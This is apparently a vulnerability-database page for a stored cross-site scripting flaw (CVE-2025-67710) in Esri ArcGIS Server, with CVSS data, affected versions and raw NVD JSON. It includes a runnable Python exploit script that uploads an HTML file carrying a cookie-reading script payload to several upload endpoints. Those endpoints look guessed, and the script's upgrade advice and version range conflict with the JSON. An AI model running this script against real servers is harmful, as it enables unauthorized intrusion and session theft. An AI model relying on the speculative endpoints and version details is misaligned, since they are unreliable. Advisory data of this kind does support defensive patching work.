Security Vulnerability Report
CVE-2025-67710 CVSS 6.1 MEDIUM

Published: 2025-12-31 23:15:42
Last Modified: 2026-01-06 19:04:06

Description

There is a stored cross site scripting issue in Esri ArcGIS Server 11.4 and earlier on Windows and Linux that in some configurations allows a remote unauthenticated attacker to store files that contain malicious code that may execute in the context of a victim’s browser.

CVSS Details

CVSS Score: 6.1
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:esri:arcgis_server:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE

Esri ArcGIS Server 11.4 (Windows/Linux)
Esri ArcGIS Server 11.3 (Windows/Linux)
Esri ArcGIS Server 11.2 (Windows/Linux)
Esri ArcGIS Server 11.1 (Windows/Linux)
Esri ArcGIS Server 11.0 (Windows/Linux)
Esri ArcGIS Server 10.9.x (Windows/Linux)
Esri ArcGIS Server 10.8.x (Windows/Linux)
All versions of Esri ArcGIS Server <= 11.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-67710 PoC - Esri ArcGIS Server Stored XSS
# Description: Stored XSS in Esri ArcGIS Server 11.4 and earlier
# CVSS: 6.1 (MEDIUM) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

import requests
import urllib3

urllib3.disable_warnings()

TARGET = "https://vulnerable-arcgis-server.com/arcgis"
PAYLOAD = "<script>alert(document.cookie)</script>"


def exploit_stored_xss():
    """
    Exploit for CVE-2025-67710: Stored XSS in Esri ArcGIS Server
    This PoC demonstrates uploading a file with malicious JavaScript content
    """
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)',
        'Content-Type': 'application/octet-stream',
    }

    # Malicious file content containing XSS payload
    malicious_content = f'''
    <html>
    <body>
    <h1>Map Configuration File</h1>
    {PAYLOAD}
    <p>Please enable JavaScript to view this content.</p>
    </body>
    </html>
    '''

    # Try to upload malicious file to ArcGIS Server
    upload_endpoints = [
        f"{TARGET}/rest/services/Upload",
        f"{TARGET}/admin/uploads/upload",
        f"{TARGET}/server/uploads/upload",
    ]

    print(f"[*] Target: {TARGET}")
    print(f"[*] Payload: {PAYLOAD}")
    print(f"[*] Attempting to upload malicious file...")

    for endpoint in upload_endpoints:
        try:
            response = requests.post(
                endpoint,
                data=malicious_content.encode(),
                headers=headers,
                verify=False,
                timeout=30
            )
            if response.status_code in [200, 201, 202]:
                print(f"[+] Successfully uploaded to: {endpoint}")
                print(f"[+] Response: {response.text[:200]}")
                return True
        except requests.RequestException as e:
            print(f"[-] Failed to upload to {endpoint}: {e}")

    print("[*] Note: Actual exploitation may require specific authentication or configuration")
    print("[*] Please verify the target is running a vulnerable version (11.4 or earlier)")
    return False


def check_version():
    """Check ArcGIS Server version"""
    try:
        version_url = f"{TARGET}/server/sdk/rest/index.html"
        response = requests.get(version_url, verify=False, timeout=10)
        print(f"[*] Server responded with status: {response.status_code}")
    except:
        print("[*] Could not determine version")


if __name__ == "__main__":
    print("="*60)
    print("CVE-2025-67710 PoC - Esri ArcGIS Server Stored XSS")
    print("="*60)
    check_version()
    exploit_stored_xss()
    print("\n[*] Mitigation: Upgrade to ArcGIS Server 11.4.1 or later")
```

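References

https://www.esri.com/arcgis-blog/products/trust-arcgis/administration/arcgis-server-security-2025-update-2-patch (Patch, Vendor Advisory)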

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-67710",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-31T23:15:42.270",
    "lastModified": "2026-01-06T19:04:06.150",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "There is a stored cross site scripting issue in Esri ArcGIS Server 11.4 and earlier on Windows and Linux that in some configurations allows a remote unauthenticated attacker to store files that contain malicious code that may execute in the context of a victim’s browser."
      },
      {
        "lang": "es",
        "value": "Hay un problema de scripting entre sitios almacenado en Esri ArcGIS Server 11.4 y versiones anteriores en Windows y Linux que en algunas configuraciones permite a un atacante remoto no autenticado almacenar archivos que contienen código malicioso que puede ejecutarse en el contexto del navegador de una víctima."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 6.1,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-79"}
        ]
      }
    ],
    "configurations": [
      {
        "operator": "AND",
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:esri:arcgis_server:*:*:*:*:*:*:*:*",
                "versionEndIncluding": "11.5",
                "matchCriteriaId": "EC44DA7C-0CB3-4D79-B502-2B26954DB4DC"
              }
            ]
          },
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": false,
                "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*",
                "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"
              },
              {
                "vulnerable": false,
                "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*",
                "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://www.esri.com/arcgis-blog/products/trust-arcgis/administration/arcgis-server-security-2025-update-2-patch",
        "source": "[email protected]",
        "tags": ["Patch", "Vendor Advisory"]
      }
    ]
  }
}
```